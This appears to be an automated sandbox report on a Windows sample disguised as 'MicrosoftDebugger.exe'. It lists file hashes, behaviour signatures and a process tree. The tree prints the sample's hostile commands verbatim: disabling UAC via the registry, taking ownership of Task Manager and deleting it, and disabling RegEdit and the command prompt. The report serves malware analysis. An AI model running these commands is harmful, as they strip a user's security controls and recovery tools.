Resubmissions

11/06/2024, 19:49

240611-yjqwdsyhjh 10

11/06/2024, 19:47

240611-yhy6daygpg 10

Analysis

  • max time kernel
    1s
  • max time network
    7s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    11/06/2024, 19:47

General

  • Target

    MicrosoftDebugger.exe

  • Size

    101KB

  • MD5

    894aae812eb6f72bbd33c795d4db67fb

  • SHA1

    b6e089caab3470431b18316ffd82ea49783d4a72

  • SHA256

    10d6eda28eab6b3c3f3ce1183ddc2ddf39559eaf090d794b95b2c481b25241a5

  • SHA512

    0ad002903e4d0bf50578630f0dfe7f943632c6562871caa07cd527a19ddf50cb2f888334e6574b3fe39ff176fbb0cda60cb1612c96f91921f0421230503baec1

  • SSDEEP

    3072:pJrwXlyq82c0PTuMqSwNd4IYh5eWBgaQE:HYJy0pqDfE

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Disables RegEdit via registry modification 1 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\MicrosoftDebugger.exe
    "C:\Users\Admin\AppData\Local\Temp\MicrosoftDebugger.exe"
    1⤵
    • Enumerates system info in registry
    • Suspicious use of WriteProcessMemory
    PID:3024
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3716
      • C:\Windows\SysWOW64\reg.exe
        REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • UAC bypass
        • Modifies registry key
        PID:2076
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c takeown /F "C:\Windows\System32\Taskmgr.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3480
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F "C:\Windows\System32\Taskmgr.exe"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:3596
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\System32\Taskmgr.exe" /grant "%USERNAME%":(F)
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:856
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Windows\System32\Taskmgr.exe" /grant "Admin":(F)
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:4544
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c takeown /F "C:\Windows\System32\Taskmgr.exe" && icacls "C:\Windows\System32\Taskmgr.exe" /grant "%USERNAME%":(F) && del /F /Q "C:\Windows\System32\Taskmgr.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:916
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F "C:\Windows\System32\Taskmgr.exe"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2728
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Windows\System32\Taskmgr.exe" /grant "Admin":(F)
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2272
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3780
      • C:\Windows\SysWOW64\reg.exe
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
        3⤵
        • Disables RegEdit via registry modification
        • Modifies registry key
        PID:2580
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 1 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2212
      • C:\Windows\SysWOW64\reg.exe
        REG ADD HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 1 /f
        3⤵
        • Modifies registry key
        PID:2124

Network

MITRE ATT&CK Enterprise v15
